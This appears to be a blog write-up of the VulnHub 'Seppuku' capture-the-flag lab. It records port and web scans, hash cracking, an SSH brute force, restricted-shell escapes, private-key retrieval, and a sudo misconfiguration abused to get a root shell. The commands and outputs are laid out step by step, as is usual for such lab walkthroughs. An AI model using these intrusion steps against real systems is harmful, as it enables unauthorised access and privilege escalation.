Seppuku – Pentesting Fun Stuff

Introduction

At the moment of writing, this is the latest challenge created by the SunCSR Team and hosted on VulnHub.
This challenge is rated ‘Intermediate to Hard’ and has rabbit holes to watch out for.
The goal is to get root shell and obtain the flag under /root.
It is part of a series of challenges ranking from beginner and upwards.
The challenges itself are a mix of CTF-like combined with realistic admin mistakes.
Hopefully this team will create a lot more challenges, but for now let’s enjoy the last one.

Enumeration

As always we start with a port-scan to get a good view on what ports are open and what services are running behind them.

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title:  404 Not Found
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: 2020-06-11T11:43:26+00:00; -1s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
MAC Address: 00:0C:29:54:84:CE (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/11%OT=21%CT=1%CU=36600%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5EE218E0%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=106%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m58s, deviation: 2h00m00s, median: -1s
|_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2020-06-11T07:43:23-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-11T11:43:23
|_  start_date: N/A

From the scan it looks like there is an FTP-server (port 21), an SSH-server (port 22), several web-servers (ports 80, 7080, 7601 and 8088) and an SMB-server (ports 139 and 445).
The FTP and SSH servers need credentials, so I’ll start with enumerating the web-servers.

Nikto

For a basic web-server scan, Nikto is a very useful tool.

Starting with port 80:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    10.0.0.18
+ Target Port:        80
+ Start Time:         2020-06-11 14:39:35 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ / - Requires Authentication for realm 'Restricted Content'
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 8040 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2020-06-11 14:39:52 (GMT2) (17 seconds)
---------------------------------------------------------------------------

There is an info.php file and basic authentication in place.
Unlike its predecessors (other challenges from this creator), this one doesn’t have admin:admin credentials.

Next up is port 7080:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    seppuku
+ Target Port:        7080
+ Start Time:         2020-06-11 14:56:10 (GMT2)
---------------------------------------------------------------------------
+ Server: LiteSpeed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://seppuku/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7681 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2020-06-11 14:56:31 (GMT2) (21 seconds)
---------------------------------------------------------------------------

port 7601:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    10.0.0.18
+ Target Port:        7601
+ Start Time:         2020-06-11 14:47:18 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: ab, size: 5a58219394d90, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3268: /c/: Directory indexing found.
+ OSVDB-3092: /c/: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /database/: Directory indexing found.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3268: /a/: Directory indexing found.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /ckeditor/ckeditor.js: CKEditor identified. This file might also expose the version of CKEditor.
+ /ckeditor/CHANGES.md: CKEditor Changelog identified.
+ 7892 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2020-06-11 14:47:41 (GMT2) (23 seconds)
---------------------------------------------------------------------------

This one has some interesting findings.

Index of /secret
Name	Last modified	Size	Description
Parent Directory	 	        - 	 
hostname	2020-05-13 03:41 	8 	 
jack.jpg	2018-09-12 03:49 	58K	 
passwd.bak	2020-05-13 03:47 	2.7K	 
password.lst	2020-05-13 03:59 	672 	 
shadow.bak	2020-05-13 03:48 	1.4K	 
Apache/2.4.38 (Debian) Server at 10.0.0.18 Port 7601

Hostname = seppuku
The image is that of Jack the Ripper (not very subtle or another rabbit hole?)
A password list and a passwd and shadow file.
The warning about the rabbit hole and this seems just way too easy, but hey, let’s give it a try.

n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ unshadow passwd.bak shadow.bak > hashes.txt
n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
a1b2c3           (rabbit-hole)
1g 0:00:00:00 DONE (2020-06-11 15:32) 1.219g/s 2809p/s 2809c/s 2809C/s slimshady..abcdefgh
Use the "--show" option to display all of the cracked passwords reliably
Session completed

There are some things that are bothering me.
1. the name of the user is rabbit-hole (I was warned to look out for it)
2. the usernames in passwd and shadow are slightly different (for John to work, I needed to alter it)
3. the found password doesn’t work on anything (this one kills me hahaha)

So, not wasting my time much longer, I discard this option and check what else I have found.

In this folder are two other items that are interesting.
The hostname, being seppuku, and a password list.
Because this means brute-forcing, which I really dislike, I’ll finish the enumeration on the other web-servers first.

Another finding is CKEditor. In the javascript file I can find the version number:

version:"4.14.0",revision:"8a12b04171"

Checking exploit-db it looks like this version has no known vulnerability. Skipping it for now.

/keys/

And finally port 8088:

---------------------------------------------------------------------------
+ Target IP:          10.0.0.18
+ Target Hostname:    10.0.0.18
+ Target Port:        8088
+ Start Time:         2020-06-11 14:48:04 (GMT2)
---------------------------------------------------------------------------
+ Server: LiteSpeed
+ Server may leak inodes via ETags, header found with file /, inode: ab, size: 5ebb9a5f, mtime: 215e6;;;
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.6.36
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.php, /index.html
+ 7895 requests: 4 error(s) and 6 item(s) reported on remote host
+ End Time:           2020-06-11 14:49:46 (GMT2) (102 seconds)
---------------------------------------------------------------------------

By default the browser lands on index.html with this web-server, but if you go manually to index.php, you get something more interesting:

According to the website, Web Console is a web-based application that allows to execute shell commands on a server directly from a browser (web-based SSH).

login: admin
password: *****
Wrong password try again!
login: ldkjfs
password: *******
Wrong password try again!
login: lskdjfsldfk
password: ***********
Wrong password try again!
login: sldkfjsfdlk
password: *********
Wrong password try again!
login: sldkfjsdlkj
password: ***********
Wrong password try again!

From the looks of it, there is no clipping level keeping me from a brute-force session (maybe later).

Phase 2

Let’s start with brute-forcing the SSH-server first (if this works, I can skip al other nonsense).

[DATA] attacking ssh://10.0.0.18:22/
[22][ssh] host: 10.0.0.18   login: seppuku   password: eeyoree

So……..this is a welcome surprise.

n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ ssh seppuku@10.0.0.18
seppuku@10.0.0.18's password: 
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 13 10:52:41 2020 from 192.168.1.48
seppuku@seppuku:~$ id
uid=1000(seppuku) gid=1000(seppuku) groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

seppuku@seppuku:~$ ls -lah
total 28K
drwxr-xr-x 3 seppuku seppuku 4.0K Jun 11 08:00 .
drwxr-xr-x 5 root    root    4.0K May 13 04:50 ..
-rw-r--r-- 1 seppuku seppuku  220 May 13 00:28 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3.5K May 13 00:28 .bashrc
drwx------ 3 seppuku seppuku 4.0K May 13 10:05 .gnupg
-rw-r--r-- 1 root    root      20 May 13 04:47 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13 00:28 .profile
seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A

seppuku@seppuku:~$ cd .gnupg/
-rbash: cd: restricted

Wait, what?

seppuku@seppuku:~$ echo $SHELL
/bin/rbash

Crap……I’m inside a restricted shell.

When inside a restricted shell, it is wise to do some enumeration first.
Like, what available commands are there?
Which operators work?
What programming languages are available (python, perl, ruby, etc.)?
What commands can you run (sudo)?

seppuku@seppuku:~$ chsh
Password: 
Changing the login shell for seppuku
Enter the new value, or press ENTER for the default
	Login Shell [/bin/rbash]: /bin/bash
seppuku@seppuku:~$ echo $SHELL
/bin/rbash
seppuku@seppuku:~$ su seppuku
Password: 
seppuku@seppuku:~$ echo $SHELL
/bin/bash
seppuku@seppuku:~$ echo test > test

Here I used the program chsh to change my shell (easy right?).
In a better restricted environment this probably wouldn’t be an option, but it’s always good to check.

seppuku@seppuku:~$ sudo -l
Matching Defaults entries for seppuku on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seppuku may run the following commands on seppuku:
    (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/

I can make symbolic links from /root to /tmp/.
What else?

seppuku@seppuku:~$ ls /home
samurai  seppuku  tanto

And I have a passwd file with just one password.

seppuku@seppuku:~$ su samurai
Password: 
samurai@seppuku:/home/seppuku$ id
uid=1001(samurai) gid=1002(samurai) groups=1002(samurai)

samurai@seppuku:~$ echo $SHELL
/bin/rbash

<sigh>

Just repeat the previous option.
Also……If your shell gives you problems with restrictions (while you have a bash shell), just exit and log back in with SSH.
You will have a good working bash shell.

samurai@seppuku:/home/seppuku$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

samurai@seppuku:~$ ls -lah ../tanto/
total 32K
drwxr-xr-x 5 tanto tanto 4.0K Jun 11 08:00 .
drwxr-xr-x 5 root  root  4.0K May 13 04:50 ..
-rw-r--r-- 1 tanto tanto  220 May 13 04:50 .bash_logout
-rw-r--r-- 1 tanto tanto 3.5K May 13 04:50 .bashrc
drwx------ 3 tanto tanto 4.0K May 13 05:27 .gnupg
drwxr-xr-x 3 tanto tanto 4.0K May 13 05:23 .local
-rw-r--r-- 1 tanto tanto  807 May 13 04:50 .profile
drwxr-xr-x 2 tanto tanto 4.0K May 13 05:26 .ssh

No .cgi_bin. Another rabbit hole?
Unlike my current user and the previous one, user Tanto has a .ssh folder.

In the beginning of the enumeration, I found a ssh key.
Let’s try and use it on user tanto.

samurai@seppuku:/home/tanto/.ssh$ which nc
samurai@seppuku:/home/tanto/.ssh$ which netcat
samurai@seppuku:/home/tanto/.ssh$ which wget
/usr/bin/wget

To transfer a file I need a transportation tool…….looks like we have wget at our disposal.
First I start up a python web-server at the location where the SSH key is.

n0w4n@lab:~/ctf/vulnhub/seppuku/7601$ sudo python3 -m http.server 80
[sudo] password for n0w4n: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then I retrieve the key and rename it and changing its permissions (else SSH will begin to scream bloody murder).

samurai@seppuku:~$ mv private.bak id_rsa && chmod 600 id_rsa

And finally log in as user tanto using the key.

The authenticity of host '10.0.0.18 (10.0.0.18)' can't be established.
ECDSA key fingerprint is SHA256:RltTwzbYqqcBz4/ww5KEokNttE+fZwM7l4bvzFaf558.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.18' (ECDSA) to the list of known hosts.
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 13 10:53:17 2020 from 192.168.1.48
tanto@seppuku:~$ id
uid=1002(tanto) gid=1003(tanto) groups=1003(tanto)

tanto@seppuku:~$ cd
-rbash: cd: restricted

The previous method won’t work, because I don’t have a password for this user.
Luckily there are numerous other ways to get out of a restricted shell.

tanto@seppuku:~$ bash -i
tanto@seppuku:~$ cd

Now that I am free to do as I please, it’s time to take a look at the sudo command from user samurai.

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

Basically it says it will run a file called bin from the folder /home/tanto/.cgi_bin as root.
Cool.

Let’s create a folder and file so the sudo permission of samurai can exploit it.

tanto@seppuku:~$ mkdir .cgi_bin && cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ echo "/bin/bash" > bin
tanto@seppuku:~/.cgi_bin$ chmod 777 bin

Now from another shell with user samurai open:

samurai@seppuku:/home/seppuku$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/home/seppuku# id
uid=0(root) gid=0(root) groups=0(root)

root@seppuku:~# ls -lah
total 40K
drwx------  5 root root 4.0K May 13 10:42 .
drwxr-xr-x 18 root root 4.0K May 13 00:25 ..
-rw-------  1 root root  126 May 13 10:53 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K May 13 10:41 .gnupg
drwxr-xr-x  3 root root 4.0K May 13 02:53 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   24 May 13 04:51 root.txt
-rw-r--r--  1 root root   66 May 13 05:31 .selected_editor
drwxr-xr-x  2 root root 4.0K May 13 10:39 .ssh
root@seppuku:~# cat root.txt
{SunCSR_Seppuku_2020_X}

And there you have it.

Conclusion

This was by far the best challenge out of the series.
It had multiple misleading options and a lot to go through.
As with a lot of pentesting notes are so very important, so you can keep track on what you’re doing.

I really like the fact I needed to link stuff I found in the beginning use at the end the get further.

Really nice work with this challenge.

Tags: bruteforce rbash ssh sudo

Introduction

Enumeration

Nikto

Phase 2

Conclusion

Leave a Reply Cancel reply